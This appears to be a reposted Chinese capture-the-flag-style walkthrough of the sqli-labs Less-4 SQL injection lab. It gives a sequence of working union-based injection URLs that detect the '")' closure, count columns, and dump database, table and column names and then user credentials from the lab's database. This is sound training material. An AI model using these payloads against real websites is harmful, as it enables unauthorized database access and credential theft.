欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 金融 > SQL注入靶场sqli-labs less-4

SQL注入靶场sqli-labs less-4

2025/3/13 2:50:14 来源:https://blog.csdn.net/wanggonghanfei/article/details/142676461  浏览:    关键词:SQL注入靶场sqli-labs less-4

sqli-labs靶场第三关less-4

在这里插入图片描述

1、确定注入点

http://192.168.128.3/sq/Less-4/?id=1
http://192.168.128.3/sq/Less-4/?id=2
有不同回显,判断可能存在注入,

2、判断注入类型

输入

http://192.168.128.3/sq/less-4/?id=1 and 1=1
http://192.168.128.3/sq/less-4/?id=1 and 1=2
回显一致,猜测不是数字型注

加单引号

http://192.168.128.3/sq/less-4/?id=1’
没有回显,猜测其他闭合方式
输入双引号
http://192.168.128.3/sq/Less-4/?id=1“

报出错误

在这里插入图片描述
由结果判断闭合方式为 ")

3、确定列数

http://192.168.128.3/sq/less-4/?id=1") order by 5 --+
http://192.168.128.3/sq/less-4/?id=1") order by 4 --+
http://192.168.128.3/sq/less-4/?id=1") order by 3 --+

4,5回显报错,3的时候回显
确定列数为3

4、确定回显位

http://192.168.128.3/sq/less-4/?id=-1") union select 1,2,3 --+

在这里插入图片描述
确定2,3为回显位置

5、确定数据库名,数据库版本

http://192.168.128.3/sq/Less-4/?id=-1") union select 1,version(),database()–+

在这里插入图片描述

5、爆出数据库名,表名,列名,数据

  • 爆出数据库名
    http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata --+
  • 爆出选定数据库表名
    http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()–+
  • 爆出列名
    http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’–+
  • 爆出数据
    http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(username,‘%20’,password),3 from security.users–+

最终得到数据
在这里插入图片描述

大功告成

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词